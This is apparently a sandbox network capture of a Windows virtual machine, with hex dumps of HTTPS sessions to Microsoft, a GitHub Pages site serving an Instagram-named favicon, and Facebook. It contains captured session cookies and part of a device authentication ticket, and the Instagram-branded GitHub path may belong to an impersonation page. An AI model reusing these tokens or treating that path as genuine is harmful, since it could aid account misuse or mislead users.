                                                                                                                                                                                                                                  2024-09-29 04:53:06 UTC1378INData Raw: 9f 38 ee 53 14 1a 55 3e 14 6d a9 99 79 fd 6c d9 0c 99 b1 d1 94 9a 75 9d 06 c9 8b 27 9f 27 b7 b5 ea cc 3c 99 0c 89 4d 1c d1 0e d5 d9 26 26 96 7b 30 71 fc b8 89 9a ac 9c 1c 76 06 47 12 9d 2c ce 7b 94 08 87 53 ae 8a 29 34 ba b3 c2 a2 cc c8 a1 d0 f4 0d bc de a3 e4 37 e1 b5 f6 35 1e 87 d0 a8 94 7e 28 c5 a9 da d9 12 1a 0d a9 99 79 1d 64 e6 db f5 e8 49 cd a6 ce 83 e5 f5 0e fd e4 9e d6 dd a5 53 a3 66 94 81 8c 61 d7 90 89 9a 70 89 8e 0e 9d 6f d2 eb e9 e0 f8 21 36 61 22 36 71 af c6 8c 9b 24 c4 46 37 62 83 b6 44 04 22 ce 9b 2c 3e b7 ce 39 b7 cf af 53 ae 74 e5 04 d2 88 7f 2f 44 d8 21 35 dd cf e2 3c c6 24 f2 26 fc 3e b3 69 99 2e e6 f1 e9 9e 07 7c 67 dd f7 0b 5c 03 7e c7 12 c7 70 6b 29 16 d2 cb a6 d0 28 48 0d 64 e6 a3 ea 6f e7 d1 91 9a cd 9d 86 c8 d2 53 2e 92 ff 6d 73
                                                                                                                                                                                                                                  Data Ascii: 8SU>mylu''<M&&{0qvG,{S)475~(ydISfapo!6a"6q$F7bD",>9St/D!5<$&>i.|g\~pk)(HdoS.ms
                                                                                                                                                                                                                                  2024-09-29 04:53:06 UTC425INData Raw: 52 43 08 21 84 90 34 00 07 81 8b b8 d2 62 de 76 fb cb 41 42 83 a1 27 77 82 30 a5 86 10 42 08 21 c5 48 02 76 cb cc 8c 19 33 be 70 bb 8b a7 d0 80 e1 c3 87 7f c7 9d 4f 83 1d 32 a7 86 10 42 08 21 c5 c8 99 b1 65 06 81 17 65 a1 29 24 35 f6 ec 27 4e e9 26 84 10 42 48 5c 51 19 77 ad 19 80 d1 23 b8 49 21 6f 29 28 34 b6 d4 b8 87 9f 9c c5 f7 58 51 98 10 42 08 21 a6 12 7f 27 4d 9a 24 5e ce e1 17 99 51 12 1a 3b a7 c6 9d 28 ec 04 73 c2 21 37 58 a5 1b 82 03 18 c1 21 84 10 42 48 a1 24 5f db 17 e0 0e 18 f9 71 e7 c9 b8 13 80 83 64 46 49 68 9c 53 ba bd 86 a0 08 21 84 10 42 4c 83 11 22 f7 d4 6c 23 42 63 47 6b 50 51 b8 d0 30 14 21 84 10 42 48 54 91 41 10 45 c7 4f b4 85 c6 09 16 b4 c4 2a dd 94 1b 42 08 21 84 44 01 39 32 18 5a f2 4b fa 8d 4d 68 dc 91 1b 84 85 60 54 88 e0 10 42
                                                                                                                                                                                                                                  Data Ascii: RC!4bvAB'w0B!Hv3pO2B!ee)$5'N&BH\Qw#I!o)(4XQB!'M$^Q;(s!7X!BH$_qdFIhS!BL"l#BcGkPQ0!BHTAEO*B!D92ZKMh`TB


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  14192.168.2.649732184.28.90.27443
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:06 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                  Host: fs.microsoft.com
                                                                                                                                                                                                                                  2024-09-29 04:53:06 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                  Server: ECAcc (lpl/EF67)
                                                                                                                                                                                                                                  X-CID: 11
                                                                                                                                                                                                                                  X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                  X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                                                  Cache-Control: public, max-age=129116
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:06 GMT
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  X-CID: 2


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  15192.168.2.649736185.199.108.1534431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:06 UTC374OUTGET /instagram.com/img/insta-fav.ico HTTP/1.1
                                                                                                                                                                                                                                  Host: sayidanur.github.io
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:06 UTC754INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 5430
                                                                                                                                                                                                                                  Server: GitHub.com
                                                                                                                                                                                                                                  Content-Type: image/vnd.microsoft.icon
                                                                                                                                                                                                                                  permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                  x-origin-cache: HIT
                                                                                                                                                                                                                                  Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                  ETag: "669df693-1536"
                                                                                                                                                                                                                                  expires: Sun, 29 Sep 2024 05:03:06 GMT
                                                                                                                                                                                                                                  Cache-Control: max-age=600
                                                                                                                                                                                                                                  x-proxy-cache: MISS
                                                                                                                                                                                                                                  X-GitHub-Request-Id: A29A:1664:12D80B6:1598F40:66F8DD32
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Age: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:06 GMT
                                                                                                                                                                                                                                  Via: 1.1 varnish
                                                                                                                                                                                                                                  X-Served-By: cache-ewr-kewr1740062-EWR
                                                                                                                                                                                                                                  X-Cache: MISS
                                                                                                                                                                                                                                  X-Cache-Hits: 0
                                                                                                                                                                                                                                  X-Timer: S1727585586.362200,VS0,VE20
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Fastly-Request-ID: 45a302e1c9ec0c684c25a511a5aa11ea6301a221
                                                                                                                                                                                                                                  2024-09-29 04:53:06 UTC1378INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 d2 fb 39 7d dd ff 72 85 de ff d7 86 e0 ff ff 80 da ff ff 78 d2 fe ff 6c c6 fe ff 5f b3 fd ff 55 9a fc ff 4f 78 f4 d8 54 52 ed 73 65 39 e0 3a 00 00 00 00 00 00 00 00 00 ff ff 01 55 b8 fb 81 64 ca ff fa 6f d6 ff ff 6a d1 ff ff 67 cd fe ff 63 c8 fe ff 5c bf fd ff 53 b1 fc ff 48 9c fb ff 40 80 f7 ff 42 62 f4 ff 57 4d f4 ff 6d 37 e5 fb 7a 2c d8 84 ff 00 ff 01 3b 96 f6 38 43 a4 fc fd 48 b0 fe ff 52 b8 fd ff 92 d6 fe ff b6 e4 ff ff bb e5 ff ff bb e2 fe ff b8 dc fe ff b2 d1 fd ff a8 c0 fb ff 85 90 f5 ff 5a
                                                                                                                                                                                                                                  Data Ascii: h& ( t9}rxl_UOxTRse9:Udojgc\SH@BbWMm7z,;8CHRZ
                                                                                                                                                                                                                                  2024-09-29 04:53:06 UTC1378INData Raw: 7b d8 fe ff 79 d6 fe ff 76 d3 fe ff 72 cf fe ff 6d ca fe ff 68 c4 fd ff 63 bc fd ff 5d b3 fc ff 57 a8 fc ff 52 9c fa ff 4e 8e f8 ff 4c 7e f5 ff 4c 6e f4 ff 51 5d f7 ff 58 4e f2 ff 60 42 e7 fd 6c 37 e3 cb 73 2f da 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 b9 fd 74 5f c4 fe fd 65 cb ff ff 66 ca ff ff 6a cd fe ff 6d cf fe ff 6f d1 fe ff 70 d1 fe ff 70 d1 fe ff 6f d0 fe ff 6d ce fe ff 6a cb fe ff 67 c6 fe ff 63 c1 fd ff 5e bb fd ff 59 b3 fc ff 54 a9 fc ff 4f 9e fb ff 4b 91 f9 ff 48 83 f6 ff 47 73 f4 ff 47 62 f1 ff 4c 52 ed ff 55 48 e9 ff 60 3e e5 ff 6f 35 e6 ff 78 2f e0 fe 7b 2e d9 7a 00 00 00 00 00 00 00 00 00 00 00 00 4a a8 f8 4c 4f b2 fe fd 52 b8 ff ff 56 bc fd ff 5a c0 fd ff 5d c4 fe ff 60 c6 fe ff 60 c7 fe ff 5d c6 fe ff 5a c4 fe
                                                                                                                                                                                                                                  Data Ascii: {yvrmhc]WRNL~LnQ]XN`Bl7s/RVt_efjmoppomjgc^YTOKHGsGbLRUH`>o5x/{.zJLORVZ]``]Z
                                                                                                                                                                                                                                  2024-09-29 04:53:06 UTC1378INData Raw: e2 ff a4 af f2 ff ff ff ff ff a5 b5 f6 ff 34 5b ec ff 3d 65 ef ff 3b 64 f0 ff 3d 62 f0 ff c8 d3 fb ff ff ff ff ff ed ef fe ff 95 9f f6 ff 65 71 f1 ff 68 6f f1 ff 9c 9b f4 ff f0 f0 fd ff ff ff ff ff cc c3 f8 ff 5f 33 e5 ff 68 2c e3 ff 6e 2b e1 ff 67 22 dd ff bf a3 f0 ff ff ff ff ff b7 92 eb ff 74 24 d6 ff 82 2f d8 ff 86 30 d6 ff 89 30 d4 ff 66 50 cd ff 60 53 d3 ff 59 56 d8 ff 4a 4e db ff aa ae f0 ff ff ff ff ff a6 ae f3 ff 3d 53 e7 ff 45 5c eb ff 3d 55 eb ff 87 95 f3 ff ff ff ff ff ed ee fd ff 63 6b ef ff 3a 42 eb ff 44 46 eb ff 48 42 ea ff 44 35 e7 ff 72 60 eb ff f1 ee fd ff ff ff ff ff 9a 73 eb ff 67 23 df ff 70 2b df ff 6a 22 db ff be a0 ef ff ff ff ff ff ba 96 eb ff 76 24 d5 ff 84 2f d7 ff 88 30 d5 ff 8c 2e d3 ff 71 47 c4 ff 6b 4a ca ff 64 4d d1 ff 54
                                                                                                                                                                                                                                  Data Ascii: 4[=e;d=beqho_3h,n+g"t$/00fP`SYVJN=SE\=Uck:BDFHBD5r`sg#p+j"v$/0.qGkJdMT
                                                                                                                                                                                                                                  2024-09-29 04:53:06 UTC1296INData Raw: 9c 2a bf ff a3 31 c0 ff a5 31 be ff a7 31 bd ff ae 3c 7c d3 af 3c 81 ff aa 3b 82 ff a6 38 85 ff a5 43 90 ff f3 e8 f2 ff ff ff ff ff b9 7e be ff 8d 27 99 ff 95 33 a7 ff 95 35 ad ff 94 35 b1 ff 93 34 b4 ff 92 33 b6 ff 90 33 b8 ff 8e 31 ba ff 8e 31 bb ff 8f 32 bd ff 91 31 be ff 91 2f be ff 90 2c bc ff b4 72 d0 ff bb 83 d3 ff 85 22 b1 ff b7 7d d1 ff ff ff ff ff f1 e3 f6 ff a2 38 be ff a2 2f bc ff a6 32 bb ff a8 32 ba ff ae 33 bc ff b3 3c 76 80 ba 3e 7d ff b0 3c 7c ff ad 3b 7f ff a4 32 7d ff cc 91 bb ff ff ff ff ff f9 f3 f8 ff bc 7f bc ff 98 38 9c ff 93 2d 9d ff 92 2c a1 ff 91 2b a5 ff 90 2a a8 ff 8f 29 ab ff 8f 28 ad ff 90 27 ae ff 91 26 b0 ff 91 25 b0 ff 91 25 b0 ff 8f 23 af ff 88 1c ab ff 8b 26 ad ff b9 7c ce ff fa f5 fb ff ff ff ff ff c8 87 d4 ff a0 29 b4
                                                                                                                                                                                                                                  Data Ascii: *111<|<;8C~'3554331121/,r"}8/223<v>}<|;2}8-,+*)('&%%#&|)


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  16192.168.2.649737184.28.90.27443
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:07 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                  Range: bytes=0-2147483646
                                                                                                                                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                  Host: fs.microsoft.com
                                                                                                                                                                                                                                  2024-09-29 04:53:07 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                  Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                  X-CID: 11
                                                                                                                                                                                                                                  X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                  X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                  Cache-Control: public, max-age=129145
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:07 GMT
                                                                                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  X-CID: 2
                                                                                                                                                                                                                                  2024-09-29 04:53:07 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                  17192.168.2.64973840.113.110.67443
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:08 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 64 72 58 31 43 6f 55 46 69 30 2b 30 43 46 6a 2b 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 64 64 36 36 62 33 65 66 30 61 31 32 33 31 62 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: CNT 1 CON 305MS-CV: drX1CoUFi0+0CFj+.1Context: 4dd66b3ef0a1231b
                                                                                                                                                                                                                                  2024-09-29 04:53:08 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                  2024-09-29 04:53:08 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 64 72 58 31 43 6f 55 46 69 30 2b 30 43 46 6a 2b 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 64 64 36 36 62 33 65 66 30 61 31 32 33 31 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 58 45 6e 39 66 4d 54 56 31 48 4f 6b 36 78 5a 54 34 63 69 4f 74 44 64 41 52 42 4d 77 35 50 31 67 42 55 46 44 32 42 72 39 67 64 6b 6b 33 4f 44 32 67 4f 59 6b 6c 36 6d 70 4d 58 6e 57 54 70 45 39 73 4d 73 4d 74 57 39 53 54 67 76 76 2b 42 39 55 4c 55 66 45 37 76 34 41 67 31 39 6d 78 6a 2b 70 4d 43 70 69 67 69 4e 45 63 67 4a 57
                                                                                                                                                                                                                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: drX1CoUFi0+0CFj+.2Context: 4dd66b3ef0a1231b<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAaXEn9fMTV1HOk6xZT4ciOtDdARBMw5P1gBUFD2Br9gdkk3OD2gOYkl6mpMXnWTpE9sMsMtW9STgvv+B9ULUfE7v4Ag19mxj+pMCpigiNEcgJW
                                                                                                                                                                                                                                  2024-09-29 04:53:08 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 64 72 58 31 43 6f 55 46 69 30 2b 30 43 46 6a 2b 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 64 64 36 36 62 33 65 66 30 61 31 32 33 31 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                  Data Ascii: BND 3 CON\WNS 0 197MS-CV: drX1CoUFi0+0CFj+.3Context: 4dd66b3ef0a1231b<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                  2024-09-29 04:53:09 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                  2024-09-29 04:53:09 UTC58INData Raw: 4d 53 2d 43 56 3a 20 58 44 75 55 65 32 57 2b 32 55 53 51 5a 4a 5a 76 33 64 6e 6c 49 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                  Data Ascii: MS-CV: XDuUe2W+2USQZJZv3dnlIQ.0Payload parsing failed.


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  18192.168.2.649743157.240.252.354431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:14 UTC652OUTGET /?locale=ru_RU HTTP/1.1
                                                                                                                                                                                                                                  Host: www.facebook.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:15 UTC1120INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Set-Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; expires=Sat, 28-Dec-2024 04:53:15 GMT; Max-Age=7776000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                                                                  Set-Cookie: sb=O934ZizfugwK86As5FvnwEDL; expires=Mon, 03-Nov-2025 04:53:15 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                                                                  reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419923633127123911", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7419923633127123911"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  2024-09-29 04:53:15 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                  2024-09-29 04:53:15 UTC1701INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                  Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c
                                                                                                                                                                                                                                  2024-09-29 04:53:15 UTC6INData Raw: 32 64 33 65 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 2d3e
                                                                                                                                                                                                                                  2024-09-29 04:53:15 UTC1500INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 33 50 61 45 66 49 52 4c 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69
                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="ru" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="3PaEfIRL">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}wi
